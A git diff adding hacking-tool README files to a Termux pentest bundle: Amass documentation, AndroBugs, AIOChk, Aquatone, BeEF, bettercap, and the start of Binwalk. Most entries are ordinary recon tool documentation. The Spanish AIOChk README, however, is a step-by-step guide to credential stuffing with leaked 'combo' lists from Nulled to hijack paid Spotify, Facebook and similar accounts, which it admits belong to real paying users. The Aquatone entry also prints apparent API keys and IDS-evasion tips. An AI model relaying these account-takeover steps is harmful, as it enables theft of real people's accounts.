104.154.0.0/15 -noresolvrate | +| -noresolvscore | Disable resolver reliability scoring | amass intel -cidr 104.154.0.0/15 -noresolvscore | +| -o | Path to the text output file | amass intel -o out.txt -whois -d example.com | +| -org | Search string provided against AS description information | amass intel -org Facebook | +| -p | Ports separated by commas (default: 443) | amass intel -cidr 104.154.0.0/15 -p 443,8080 | +| -r | IP addresses of preferred DNS resolvers (can be used multiple times) | amass intel -r 8.8.8.8,1.1.1.1 -whois -d example.com | +| -rf | Path to a file providing preferred DNS resolvers | amass intel -rf data/resolvers.txt -whois -d example.com | +| -src | Print data sources for the discovered names | amass intel -src -whois -d example.com | +| -timeout | Number of minutes to execute the enumeration | amass intel -timeout 30 -d example.com | +| -whois | All discovered domains are run through reverse whois | amass intel -whois -d example.com | + +### The 'enum' Subcommand + +This subcommand will perform DNS enumeration and network mapping while populating the selected graph database. All the setting available in the configuration file are relevant to this subcommand. The following flags are available for configuration: + +| Flag | Description | Example | +|------|-------------|---------| +| -active | Enable active recon methods | amass enum -active -d example.com -p 80,443,8080 | +| -aw | Path to a different wordlist file for alterations | amass enum -aw PATH -d example.com | +| -bl | Blacklist of subdomain names that will not be investigated | amass enum -bl blah.example.com -d example.com | +| -blf | Path to a file providing blacklisted subdomains | amass enum -blf data/blacklist.txt -d example.com | +| -brute | Perform brute force subdomain enumeration | amass enum -brute -d example.com | +| -config | Path to the INI configuration file | amass enum -config config.ini | +| -d | Domain names separated by commas (can be used multiple times) | amass enum -d example.com | +| -demo | Censor output to make it suitable for demonstrations | amass enum -demo -d example.com | +| -df | Path to a file providing root domain names | amass enum -df domains.txt | +| -dir | Path to the directory containing the graph database | amass enum -dir PATH -d example.com | +| -do | Path to data operations output file | amass enum -do data.json -d example.com | +| -ef | Path to a file providing data sources to exclude | amass enum -ef exclude.txt -d example.com | +| -exclude | Data source names separated by commas to be excluded | amass enum -exclude crtsh -d example.com | +| -if | Path to a file providing data sources to include | amass enum -if include.txt -d example.com | +| -include | Data source names separated by commas to be included | amass enum -include crtsh -d example.com | +| -ip | Show the IP addresses for discovered names | amass enum -ip -d example.com | +| -ipv4 | Show the IPv4 addresses for discovered names | amass enum -ipv4 -d example.com | +| -ipv6 | Show the IPv6 addresses for discovered names | amass enum -ipv6 -d example.com | +| -json | Path to the JSON output file | amass enum -json out.json -d example.com | +| -list | Print the names of all available data sources | amass enum -list | +| -log | Path to the log file where errors will be written | amass enum -log amass.log -d example.com | +| -max-dns-queries | Maximum number of concurrent DNS queries | amass enum -max-dns-queries 200 -d example.com | +| -min-for-recursive | Subdomain labels seen before recursive brute forcing (Default: 1) | amass enum -brute -min-for-recursive 3 -d example.com | +| -nf | Path to a file providing already known subdomain names (from other tools/sources) | amass enum -nf names.txt -d example.com | +| -noalts | Disable generation of altered names | amass enum -noalts -d example.com | +| -nolocaldb | Disable saving data into a local database | amass enum -nolocaldb -d example.com | +| -norecursive | Turn off recursive brute forcing | amass enum -brute -norecursive -d example.com | +| -noresolvrate | Disable resolver rate monitoring | amass enum -d example.com -noresolvrate | +| -noresolvscore | Disable resolver reliability scoring | amass enum -d example.com -noresolvscore | +| -o | Path to the text output file | amass enum -o out.txt -d example.com | +| -oA | Path prefix used for naming all output files | amass enum -oA amass_scan -d example.com | +| -passive | A purely passive mode of execution | amass enum --passive -d example.com | +| -p | Ports separated by commas (default: 443) | amass enum -d example.com -p 443,8080 | +| -r | IP addresses of preferred DNS resolvers (can be used multiple times) | amass enum -r 8.8.8.8,1.1.1.1 -d example.com | +| -rf | Path to a file providing preferred DNS resolvers | amass enum -rf data/resolvers.txt -d example.com | +| -src | Print data sources for the discovered names | amass enum -src -d example.com | +| -timeout | Number of minutes to execute the enumeration | amass enum -timeout 30 -d example.com | +| -w | Path to a different wordlist file | amass enum -brute -w wordlist.txt -d example.com | + +### The 'viz' Subcommand + +Create enlightening network graph visualizations that add structure to the information gathered. This subcommand only leverages the 'output_directory' and remote graph database settings from the configuration file. + +The files generated for visualization are created in the current working directory and named amass_TYPE + +Switches for outputting the DNS and infrastructure findings as a network graph: + +| Flag | Description | Example | +|------|-------------|---------| +| -config | Path to the INI configuration file | amass viz -config config.ini -d3 | +| -d | Domain names separated by commas (can be used multiple times) | amass viz -d3 -d example.com | +| -d3 | Output a D3.js v4 force simulation HTML file | amass viz -d3 -d example.com | +| -df | Path to a file providing root domain names | amass viz -d3 -df domains.txt | +| -dir | Path to the directory containing the graph database | amass viz -d3 -dir PATH -d example.com | +| -enum | Identify an enumeration via an index from the db listing | amass viz -enum 1 -d3 -d example.com | +| -gexf | Output to Graph Exchange XML Format (GEXF) | amass viz -gephi -d example.com | +| -graphistry | Output Graphistry JSON | amass viz -graphistry -d example.com | +| -i | Path to the Amass data operations JSON input file | amass viz -d3 -d example.com | +| -maltego | Output a Maltego Graph Table CSV file | amass viz -maltego -d example.com | +| -visjs | Output HTML that employs VisJS | amass viz -visjs -d example.com | + +### The 'track' Subcommand + +Shows differences between enumerations that included the same target(s) for monitoring a target's attack surface. This subcommand only leverages the 'output_directory' and remote graph database settings from the configuration file. Flags for performing Internet exposure monitoring across the enumerations in the graph database: + +| Flag | Description | Example | +|------|-------------|---------| +| -config | Path to the INI configuration file | amass track -config config.ini | +| -d | Domain names separated by commas (can be used multiple times) | amass track -d example.com | +| -df | Path to a file providing root domain names | amass track -df domains.txt | +| -dir | Path to the directory containing the graph database | amass track -dir PATH | +| -history | Show the difference between all enumeration pairs | amass track -history | +| -last | The number of recent enumerations to include in the tracking | amass track -last NUM | +| -since | Exclude all enumerations before a specified date (format: 01/02 15:04:05 2006 MST) | amass track -since DATE | + +### The 'db' Subcommand + +Performs viewing and manipulation of the graph database. This subcommand only leverages the 'output_directory' and remote graph database settings from the configuration file. Flags for interacting with the enumeration findings in the graph database include: + +| Flag | Description | Example | +|------|-------------|---------| +| -config | Path to the INI configuration file | amass db -config config.ini | +| -d | Domain names separated by commas (can be used multiple times) | amass db -d example.com | +| -demo | Censor output to make it suitable for demonstrations | amass db -demo -d example.com | +| -df | Path to a file providing root domain names | amass db -df domains.txt | +| -dir | Path to the directory containing the graph database | amass db -dir PATH | +| -enum | Identify an enumeration via an index from the listing | amass db -enum 1 -show | +| -import | Import an Amass data operations JSON file to the graph database | amass db -import PATH | +| -ip | Show the IP addresses for discovered names | amass db -show -ip -d example.com | +| -ipv4 | Show the IPv4 addresses for discovered names | amass db -show -ipv4 -d example.com | +| -ipv6 | Show the IPv6 addresses for discovered names | amass db -show -ipv6 -d example.com | +| -json | Path to the JSON output file | amass db -names -silent -json out.json -d example.com | +| -list | Print enumerations in the database and filter on domains specified | amass db -list | +| -names | Print just discovered names | amass db -names -d example.com | +| -nocolor | Disable colorized output | amass db -names -nocolor -d example.com | +| -o | Path to the text output file | amass db -names -o out.txt -d example.com | +| -show | Print the results for the enumeration index + domains provided | amass db -show | +| -silent | Disable all output during execution | amass db -names -silent -json out.json -d example.com | +| -src | Print data sources for the discovered names | amass db -show -src -d example.com | +| -summary | Print just ASN table summary | amass db -summary -d example.com | + +## The Output Directory + +Amass has several files that it outputs during an enumeration (e.g. the log file). If you are not using a database server to store the network graph information, then Amass creates a file based graph database in the output directory. These files are used again during future enumerations, and when leveraging features like tracking and visualization. + +By default, the output directory is created in the operating system default root directory to use for user-specific configuration data and named *amass*. If this is not suitable for your needs, then the subcommands can be instructed to create the output directory in an alternative location using the **'-dir'** flag. + +If you decide to use an Amass configuration file, it will be automatically discovered when put in the output directory and named **config.ini**. + +## The Configuration File + +You will need a config file to use your API keys with Amass. See the [Example Configuration File](../examples/config.ini) for more details. + +Amass automatically tries to discover the configuration file in the following locations: + +| Operating System | Path | +| ---------------- | ---- | +| Linux / Unix | `$XDG_CONFIG_HOME/amass/config.ini` or `$HOME/.config/amass/config.ini` | +| Windows | `%AppData%\amass\config.ini` | +| OSX | `$HOME/Library/Application Support/amass/config.ini` | + +These are good places for you to put your configuration file. + +Note that these locations are based on the [output directory](#the-output-directory). If you use the `-dir` flag, the location where Amass will try to discover the configuration file will change. For example, if you pass in `-dir ./my-out-dir`, Amass will try to discover a configuration file in `./my-out-dir/config.ini`. + +### Default Section + +| Option | Description | +|--------|-------------| +| mode | Determines which mode the enumeration is performed in: default, passive or active | +| output_directory | The directory that stores the graph database and other output files | +| maximum_dns_queries | The maximum number of concurrent DNS queries that can be performed | +| include_unresolvable | When set to true, causes DNS names that did not resolve to be printed | + +### The network_settings Section + +| Option | Description | +|--------|-------------| +| address | IP address or range (e.g. a.b.c.10-245) that is in scope | +| asn | ASN that is in scope | +| cidr | CIDR (e.g. 192.168.1.0/24) that is in scope | +| port | Specifies a port to be used when actively pulling TLS certificates | + +### The domains Section + +| Option | Description | +|--------|-------------| +| domain | A root DNS domain name to be added to the enumeration scope | + +### The resolvers Section + +| Option | Description | +|--------|-------------| +| resolver | The IP address of a DNS resolver and used globally by the amass package | +| score_resolvers | Toggle resolver reliability scoring | +| monitor_resolver_rate | Toggle resolver rate monitoring | + +### The blacklisted Section + +| Option | Description | +|--------|-------------| +| subdomain | A DNS subdomain name to be considered out of scope during the enumeration | + +### The disabled_data_sources Section + +| Option | Description | +|--------|-------------| +| data_source | One of the Amass data sources that is **not** to be used during the enumeration | + +### The gremlin Section + +| Option | Description | +|--------|-------------| +| url | URL in the form of "ws://host:port" where Amass will connect to a TinkerPop database | +| username | User of the TinkerPop database server that can access the Amass graph database | +| password | Valid password for the user identified by the 'username' option | + +### The bruteforce Section + +| Option | Description | +|--------|-------------| +| enabled | When set to true, brute forcing is performed during the enumeration | +| recursive | When set to true, brute forcing is performed on discovered subdomain names as well | +| minimum_for_recursive | Number of discoveries made in a subdomain before performing recursive brute forcing | +| wordlist_file | Path to a custom wordlist file to be used during the brute forcing | + +### The alterations Section + +| Option | Description | +|--------|-------------| +| enabled | When set to true, permuting resolved DNS names is performed during the enumeration | +| minimum_for_word_flip | Number of times a word must be seen before using it for future word flips and word additions | +| edit_distance | Number of times an edit operation will be performed on a name sample during fuzzy label searching | +| flip_words | When set to true, causes words in DNS names to be exchanged for others in the alteration word list | +| flip_numbers | When set to true, causes numbers in DNS names to be exchanged for other numbers | +| add_words | When set to true, causes other words in the alteration word list to be added to resolved DNS names | +| add_numbers | When set to true, causes numbers to be added and removed from resolved DNS names | +| wordlist_file | Path to a custom wordlist file that provides additional words to the alteration word list | + +### Data Source Sections + +Each Amass data source service can have a dedicated configuration file section. The section is named just as in the output from the 'amass enum -list' command. + +This is how data sources can be configured that have authentication requirements. + +| Option | Description | +|--------|-------------| +| apikey | The API key to be used when accessing the data source | +| secret | An additional secret to be used with the API key | +| username | User for the data source account | +| password | Valid password for the user identified by the 'username' option | + +## The Graph Database + +All Amass enumeration findings are stored in a graph database. This database is either located in a single file within the output directory or connected to remotely using settings provided by the configuration file. + +When a new enumeration begins and a graph database already exists with previous findings for the same target(s), the subdomain names from those previous enumerations are utilized in the new enumeration. New DNS queries are performed against those subdomain names to ensure that they are still legitimate and to obtain current IP addresses. + +The results from each enumeration is stored separately in the graph database, which allows the tracking subcommand to look for differences across the enumerations and provide the user with highlights about the target. + +There is nothing preventing multiple users from sharing a single (remote) graph database and leveraging each others findings across enumerations. + +### Cayley Graph Schema + +The GraphDB is storing all the domains that were found for a given enumeration. It stores the associated information such as the ip, ns_record, a_record, cname, ip block and associated source for each one of them as well. Each enumeration is identified by a uuid. + +Here is an example of graph for an enumeration run on example.com: + +![GraphDB](../images/example_graphDB.png) + +## Importing OWASP Amass Results into Maltego + +1. Convert the Amass data into a Maltego graph table CSV file: + +```bash +amass viz -maltego +``` + +2. Import the CSV file with the correct Connectivity Table settings: + +![Connectivity table](../images/maltego_graph_import_wizard.png "Connectivity Table Settings") + +3. All the Amass findings will be brought into your Maltego Graph: + +![Maltego results](../images/maltego_results.png "Maltego Results") + +## Integrating OWASP Amass into Your Work + +If you are using the amass package within your own Go code, be sure to properly seed the default pseudo-random number generator: + +```go +package main + +import ( + "fmt" + "math/rand" + "time" + + "github.com/OWASP/Amass/v3/config" + "github.com/OWASP/Amass/v3/datasrcs" + "github.com/OWASP/Amass/v3/enum" + "github.com/OWASP/Amass/v3/systems" +) + +func main() { + // Seed the default pseudo-random number generator + rand.Seed(time.Now().UTC().UnixNano()) + + // Setup the most basic amass configuration + cfg := config.NewConfig() + cfg.AddDomain("example.com") + + sys, err := systems.NewLocalSystem(cfg) + if err != nil { + return + } + sys.SetDataSources(datasrcs.GetAllSources(sys)) + + e := enum.NewEnumeration(cfg, sys) + if e == nil { + return + } + defer e.Close() + + e.Start() + for _, o := range e.ExtractOutput(nil) { + fmt.Println(o.Name) + } +} +``` + +In case you get an error saying "Failed to create the graph", try changing the output directory in the config: + +```go +cfg := config.NewConfig() +cfg.Dir = "/tmp" + +sys, err := services.NewLocalSystem(cfg) +``` diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/A/androbugs.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/A/androbugs.md new file mode 100755 index 00000000..f4d02d11 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/A/androbugs.md @@ -0,0 +1,110 @@ +# AndroBugs Framework + +AndroBugs Framework is an Android vulnerability analysis system that helps developers or hackers find potential security vulnerabilities in Android applications. +No splendid GUI interface, but the most efficient (less than 2 minutes per scan in average) and more accurate. + +Version: 1.0.0 + +####Features:#### + +- Find security vulnerabilities in an Android app +- Check if the code is missing best practices +- Check dangerous shell commands (e.g. “su”) +- Collect Information from millions of apps +- Check the app’s security protection (marked as ``````, designed for app repackaging hacking) + + +##Author + +- Yu-Cheng Lin (androbugs.framework at gmail.com, @AndroBugs) + +## Steup Steps and Usage for Windows + +**Easy to use for Android developers or hackers on Microsoft Windows: (a) No need to install Python 2.7 (b) No need to install any 3rd-party library (c) No need to install AndroBugs Framework** + +1. mkdir C:\AndroBugs_Framework +2. cd C:\AndroBugs_Framework +3. Unzip the latest Windows version of AndroBugs Framework from [Windows releases](https://github.com/AndroBugs/AndroBugs_Framework/releases) +4. Go to Computer->System Properties->Advanced->Environment Variables. Add "C:\AndroBugs_Framework" to the "Path" variable +5. ```androbugs.exe -h``` +6. ```androbugs.exe -f [APK file]``` + +## Massive Analysis Tool Steup Steps and Usage for Windows +1. Complete the *Steup Steps and Usage for Windows* first +2. Install the Windows version of MongoDB (https://www.mongodb.org/downloads) +3. Install [PyMongo library](http://api.mongodb.org/python/current/installation.html) +4. Config your own MongoDB settings: C:\AndroBugs_Framework\androbugs-db.cfg +5. Choose your preferred MongoDB management tool (http://mongodb-tools.com/) +6. ```AndroBugs_MassiveAnalysis.exe -h``` + - Example: ```AndroBugs_MassiveAnalysis.exe -b 20151112 -t BlackHat -d .\All_Your_Apps\ -o .\Massive_Analysis_Reports``` +7. ```AndroBugs_ReportByVectorKey.exe -h``` + - Example: ```AndroBugs_ReportByVectorKey.exe -v WEBVIEW_RCE -l Critical -b 20151112 -t BlackHat``` + +## Usage for Unix/Linux + +####To run the AndroBugs Framework:#### + +``` +python androbugs.py -f [APK file] +``` + +####To check the usage:#### + +``` +python androbugs.py -h +``` + +## Usage of Massive Analysis Tools for Unix/Linux + +**Prerequisite: Setup MongoDB and config your own MongoDB settings in "androbugs-db.cfg"** + +####To run the massive analysis for AndroBugs Framework:#### + +``` +python AndroBugs_MassiveAnalysis.py -b [Your_Analysis_Number] -t [Your_Analysis_Tag] -d [APKs input directory] -o [Report output directory] +``` + +Example: +``` +python AndroBugs_MassiveAnalysis.py -b 20151112 -t BlackHat -d ~/All_Your_Apps/ -o ~/Massive_Analysis_Reports +``` + + +####To get the summary report and all the vectors of massive analysis:#### + +``` +python AndroBugs_ReportSummary.py -m massive -b [Your_Analysis_Number] -t [Your_Analysis_Tag] +``` + +Example: +``` +python AndroBugs_ReportSummary.py -m massive -b 20151112 -t BlackHat +``` + + +####To list the potentially vulnerable apps by Vector ID and Severity Level (Log Level):#### + +``` +python AndroBugs_ReportByVectorKey.py -v [Vector ID] -l [Log Level] -b [Your_Analysis_Number] -t [Your_Analysis_Tag] +python AndroBugs_ReportByVectorKey.py -v [Vector ID] -l [Log Level] -b [Your_Analysis_Number] -t [Your_Analysis_Tag] -a +``` + +Example: +``` +python AndroBugs_ReportByVectorKey.py -v WEBVIEW_RCE -l Critical -b 20151112 -t BlackHat +python AndroBugs_ReportByVectorKey.py -v WEBVIEW_RCE -l Critical -b 20151112 -t BlackHat -a +``` + +![AndroBugs_ReportSummary.py](http://www.androbugs.com/images/v1.0.0/MassiveAnalysisTool2.png) + +![AndroBugs_ReportByVectorKey.py](http://www.androbugs.com/images/v1.0.0/MassiveAnalysisTool1.png) + +##Requirements + +- Python 2.7.x (DO NOT USE Python 3.X) +- [PyMongo library](http://api.mongodb.org/python/current/installation.html) (If you want to use the massive analysis tool) + +##Licenses + +* AndroBugs Framework is under the license of [GNU GPL v3.0](http://www.gnu.org/licenses/gpl-3.0.txt) + diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/A/aoichk.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/A/aoichk.md new file mode 100755 index 00000000..b6cf1124 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/A/aoichk.md @@ -0,0 +1,75 @@ +# AIOChk v0.0.1 + +## Introducción + +Genera cuentas autopay "autopagables".Este proyecto tiene fines educativos y/o demostrativos. + +Tenemos un grupo en facebook > https://www.facebook.com/groups/275991826662363 + +## Novedades +> - Checkeo de version. + +## Instalación +AIOChk [TERMUX] +Como todos preguntan "¿Qué es Termux?" +Bueno *Termux* es un emulador de terminal linux para android... lo mismo que en la pc pero mas barato.... [Termux está en la +play store (gratis)] + +> Hay que tener una vpn (obligatorio) que cada vez que saquemos cuentas de facebook -solo +facebook-. + +Hay que tener un combo [Nulled Foro (o otros foros/paginas) para Descargar combos] (deben de registrarse y ya) Tambien el Es File Explorer para encontrar la ruta del archivo. + +Una ves descargado TERMUX y el AIOChk hay que actualizar paquetes... De Termux Y darle permiso a +termux en nuestro terminal... + +A los que no les pide actualizar paquetes ponen directo el 2do comando y aceptar (enter)... + +> 1. apt update&&apt upgrade -y + +> 2. termux-setup-storage + +INSTALAMOS PHP y GIT para clonar el repositorio... + +> 3. pkg install php git -y + +> 4. git clone https://github.com/Juni0r007/AIOChk.git + +> 5. ls + +> 6. cd AIOChk + +Ejecutamos el archivo *.php + +Antes de eso hay que darle permisos de ejecución al script + +> 7. chmod +x * + +> 8. php aio.php + +# Uso + +Ya instalado para ejecutar cada vez que abra Termuz solo pomer el comando: + +> cd AIOChk;php aio.php + +Una vez terminado el proceso solo deberan elegir el número de que cuenta (spotify,p0rnhub,facebook,etc) quieren generar y despues solo deberan poner la ruta del combo para generar las cuentas y solo tendran que esperar a que se generen las cuentas autopay. + +Es obligatorio -por el momento- usar una vpn (solo facebook) + +Si descargaron el combo, ahi lo unico que se debe hacer es poner la ruta completa del COMBO que estará en la carpeta de Download +> Van con el Es File hasta donde esta en combo y presionan un rato sobre el archivo -> Propiedades -> Copiar ruta completa y se van a termux y pegan esa ruta. + +Y lo pegan, empezara el checkeo y esperar a que les muestre una premiun.[Autopay]. + +> Una vez terminado el proceso de chekeo o cuando cancele manualmente el mismo, el script le pedira si quiere guardar las cuentas obtenidas en un archivo de texto (dentro de su memoria interna) si quiere guardar escriba la letra "s" y consiguiente escriba solo el nombre el archivo a crear, de lo contrario solo escriba la letra "n". + +No es necesario utilizar proxys ni una vpn activa. + +¿Que es una cuenta Auto Pagable o AutoPay? + +Son cuentas obtenidas con Sentry MBA y PasteBin [Termux pero no todas] en si estas son 100% reales por lo cual las paga una persona y si cambias la contraseña el dueño va cancelar la cuenta. + +## Anexos + +- Generador de combos en Termux > https://github.com/Juni0r007/PasTerm diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/A/aquatone.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/A/aquatone.md new file mode 100755 index 00000000..3bd788f0 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/A/aquatone.md @@ -0,0 +1,88 @@ +AQUATONE del alemán Michael Henriksen es un conjunto de herramientas escritas en Ruby para realizar reconocimientos de nombres de dominio. Puede descubrir subdominios usando fuentes abiertas o mediante fuerza bruta usando un diccionario. + +Después del descubrimiento de subdominios, AQUATONE puede escanear los hosts para identificar puertos web comunes. Además puede reunir y consolidar en un informe los encabezados HTTP, cuerpos HTML y capturas de pantalla para un análisis rápido de la superficie de ataque. + +Antes de su uso debemos añadir nuestras keys de las APIs de Shodan y Virustotal: + +$ aquatone-discover --set-key shodan o1hyw8pv59vSVjrZU3Qaz6ZQqgM91ihQ +$ aquatone-discover --set-key virustotal 132d0h354bd538656ek435876567b1g757945342347654as548f3264a8724g19 + +AQUATONE se divide en tres comandos, según queramos o no descubrir subdominios, escanear los hosts y/o obtener información de los servicios (gathering), cada una representando distintas fases que vemos a continuación: + +#Fase 1: descubrimiento (aquatone-discover) + +Lo primero que hace AQUATONE es consultar los DNS con la autoridad para el dominio objetivo. De esta manera se asegura que la información obtenida está actualizada. Luego hace una prueba rápida para ver si el dominio de destino está configurado para ser un dominio wildcard, si lo es, identificará las posibles respuestas wildcard y las filtrará. Posteriormente, procede a preguntar a cada módulo de para recopilar los subdominios: + +- Diccionario brute force (ver diccionario aquí) +- DNSDB.org http://dnsdb.org/ +- Informe de Transparencia de Google +- HackerTarget +- Netcraft +- Shodan (requiere clave de API) +- ThreatCrowd +- VirusTotal (requiere clave de API) + +El comando básico es el siguiente: + +$ aquatone-discover --domain example.com + +Por defecto tirará 5 hilos, si queremos aumentar el número para que vaya más rápido podemos usar el parámetro --threads: + +$ aquatone-discover --domain example.com --threads 25 + +Si por el contrario no queremos hacer mucho ruido podemos espaciar cada consulta DNS cada el número de segundos que especifiquemos con --sleep y un retardo variable con --jitter para evadir posibles IDS: + +$ aquatone-discover --domain example.com --sleep 5 --jitter 30 + +AQUATONE descubre los servidores DNS que resuelven los nombres de dominio objetivo y reparte las consultas entre ellos. Si las consultas hacia estos DNS fallan por defecto realizará las consultas a los DNS de Google para maximizar los resultados. Podemos especificar también otros DNS de "reserva" con: + +$ aquatone-discover --domain example.com --fallback-nameservers 87.98.175.85,5.9.49.12 + +Una vez finalizado el descubrimiento de dominios y subdominios los resultados se almacenarán en el fichero hosts.txt y hosts.json para facilitar el parseo. + +#Fase 2: escaneo (aquatone-scan) + +La etapa de escaneo es donde AQUATONE enumera los servicios web/puertos TCP abiertos en los hosts descubiertos anteriormente: + +$ aquatone-scan --domain example.com + +De forma predeterminada, aquatone-scan buscará en cada host presente en el fichero hosts.json los siguientes puertos TCP: 80, 443, 8000, 8080 y 8443. Estos son puertos muy comunes para servicios web y proporcionan una cobertura razonable, pero si queremos especificar nuestra propia lista de puertos, podemos utilizar la opción --ports: + +$ aquatone-scan --domain example.com --ports 80,443,3000,8080 + +En lugar de una lista de puertos separados por comas, también podemos especificar algunos alias predefinidos: + +- small: 80, 443 +- medium: 80, 443, 8000, 8080, 8443 (same as default) +- large: 80, 81, 443, 591, 2082, 2095, 2096, 3000, 8000, 8001, 8008, 8080, 8083, 8443, 8834, 8888, 55672 +- huge: 80, 81, 300, 443, 591, 593, 832, 981, 1010, 1311, 2082, 2095, 2096, 2480, 3000, 3128, 3333, 4243, 4567, 4711, 4712, 4993, 5000, 5104, 5108, 5280, 5281, 5800, 6543, 7000, 7396, 7474, 8000, 8001, 8008, 8014, 8042, 8069, 80 + +80, 8081, 8083, 8088, 8090, 8091, 8118, 8123, 8172, 8222, 8243, 8280, 8281, 8333, 8337, 8443, 8500, 8834, 8880, 8888, 8983, 9000, 9043, 9060, 9080, 9090, 9091, 9200, 9443, 9800, 9981, 11371, 12443, 16080, 18091, 18092, 20720, 55672 + +Por ejemplo: + +$ aquatone-scan --domain example.com --ports large + +Al igual que aquatone-discover, puede hacer el escaneado más o menos agresivo con la opción --threads que acepta un número de subprocesos para escaneos de puertos concurrentes. El número predeterminado de subprocesos es 5. + +$ aquatone-scan --domain example.com --threads 25 + +Como aquatone-scan está realizando el escaneo de puertos, obviamente puede ser detectado por IDS. Si bien tratará de reducir el riesgo de detección mediante la asignación al azar de hosts y puertos, se puede ajustar también más con las opciones --sleep y --jitter como anteriormente. Hay que tener en cuenta que el parámetro --sleep forzará los subprocesos a 1. + +#Fase 3: Gathering (aquatone-gather) + +La etapa final es la parte de recopilación de información y análisis de los servicios web descubiertos, donde se guardan los encabezados de respuesta HTTP y los cuerpos HTML, además de tomar capturas de pantalla de las páginas web para facilitar el análisis. La captura de pantalla se realiza con la biblioteca Nightmare.js de Node.js que se instalará automáticamente si no está presente en el sistema. + +Eso sí, si trabajás con Kali u otra distro que tenga previamente Node.js tendréis que instalarlo previamente: + +$ pkg install nodejs -y + +Luego el último comando será: + +$ aquatone-gather --domain example.com + +Aquatone-gather buscará hosts.json y open_ports.txt en el directorio de AQUATONE del dominio correspondiente y solicitará una captura de pantalla de cada dirección IP para cada nombre de dominio. + +Al igual que aquatone-discover y aquatone-scan, puede hacer la recopilación más o menos agresiva con la opción --threads que acepta un número de subprocesos para las solicitudes concurrentes. El número predeterminado de subprocesos es también 5. + +$ aquatone-gather --domain example.com --threads 25 diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/B/beef.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/B/beef.md new file mode 100755 index 00000000..50603cfe --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/B/beef.md @@ -0,0 +1,18 @@ +Ataques al navegador del usuario usando BeEF + +BeEF es un framework que está orientado en la explotación de vulnerabilidades en los navegadores web. Podemos usar como vector de ataque un XSS (una vulnerabilidad XSS reflejado o persistente) y mediante un iframe oculto o fichero JavaSript (JS) se pueden robar credenciales, o bien usar simples ataques de ingeniería social preguntando por la instalación de falsos certficados de seguridad, falsas actualizaciones de Flash Player o simplemente simular una sesión caducada de Facebook. + +BeEF es la abreviatura de The Browser Exploitation Framework. Es una herramienta de pruebas de penetración que se centra en el navegador web. + +En medio de la creciente preocupación por los ataques procedentes de Internet en contra de los clientes, incluyendo clientes móviles, BeEF permite la prueba de intrusión profesional para evaluar la situación de seguridad actual de un entorno de destino mediante el uso de vectores de ataque del lado del cliente. A diferencia de otros entornos de seguridad, BeEF mira más allá del perímetro de la red endurecido y sistema cliente, y examina explotabilidad en el marco de la puerta abierta: el navegador web. + +BeEF enganchará (hook) uno o más de los navegadores web y los utilizan como cabezas para el lanzamiento de los módulos de comando dirigidas y nuevos ataques contra el sistema desde dentro del contexto del explorador. + +Introducción +The Browser Exploitation Framework (BeEF ) es una poderosa herramienta de seguridad profesional. La BeEF usa técnicas pioneras que proporcionan la prueba de intrusión con experiencia a los vectores de ataque del lado del cliente prácticos. A diferencia de otros marcos de seguridad , BeEF se centra en el aprovechamiento de las vulnerabilidades del navegador para evaluar la postura de seguridad de un objetivo. Este proyecto es desarrollado exclusivamente para la investigación legal y pruebas de penetración . + +BeEF engancha (Hook ) uno o más navegadores web como cabezas de playa para la puesta en marcha de los módulos de mando dirigidos . Cada navegador es probable que sea en un contexto de seguridad diferente , y cada contexto puede proporcionar un conjunto de vectores de ataque únicos. El marco permite que el probador de la penetración pueda seleccionar los módulos específicos ( en tiempo real ) para apuntar a cada navegador , y por lo tanto a cada contexto. + +El marco contiene numerosos módulos de comando que emplean API sencilla y potente de la BeEF. Esta API está en el corazón de la eficacia y eficiencia de la estructura. Se abstrae la complejidad y facilita el desarrollo rápido de los módulos personalizados. + + diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/B/bettercap.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/B/bettercap.md new file mode 100755 index 00000000..3e848c3e --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/B/bettercap.md @@ -0,0 +1,36 @@ +**bettercap** is the Swiss Army knife for 802.11, BLE and Ethernet networks reconnaissance and attacks. + +## How to Install + +A [precompiled version is available](https://github.com/bettercap/bettercap/releases) for each release, alternatively you can use the latest version of the source code from this repository in order to build your own binary. + +Make sure you have a correctly configured **Go >= 1.8** environment, that `$GOPATH/bin` is in `$PATH`, that the `libpcap-dev` and `libnetfilter-queue-dev` (this one is only required on Linux) package installed for your system and then: + + $ go get github.com/bettercap/bettercap + $ cd $GOPATH/src/github.com/bettercap/bettercap + $ make build && sudo make install + +This command will download bettercap, install its dependencies, compile it and move the `bettercap` executable to `/usr/local/bin`. + +Now you can use `sudo bettercap -h` to show the basic command line options and just `sudo bettercap` to start an +[interactive session](https://github.com/bettercap/bettercap/wiki/Interactive-Mode) on your default network interface, otherwise you can [load a caplet](https://github.com/bettercap/bettercap/wiki/Caplets). + +Once bettercap is installed, you can download/update system caplet with the command: + + sudo bettercap -eval "caplets.update; q" + +## Update + +In order to update to an unstable but bleeding edge release from this repository, run the commands below: + + $ go get -u github.com/bettercap/bettercap + $ cd $GOPATH/src/github.com/bettercap/bettercap + $ make build && sudo make install + +## Documentation and Examples + +The project is documented [in this wiki](https://github.com/bettercap/bettercap/wiki). + +## License + +`bettercap` is made with ♥ by [the dev team](https://github.com/orgs/bettercap/people) and it's released under the GPL 3 license. diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/B/binwalk.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/B/binwalk.md new file mode 100755 index 00000000..147ee9e0 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/B/binwalk.md @@ -0,0 +1,54 @@ +# Binwalk + +[![Build Status](https://travis-ci.org/ReFirmLabs/binwalk.svg?branch=master)](https://travis-ci.org/ReFirmLabs/binwalk) 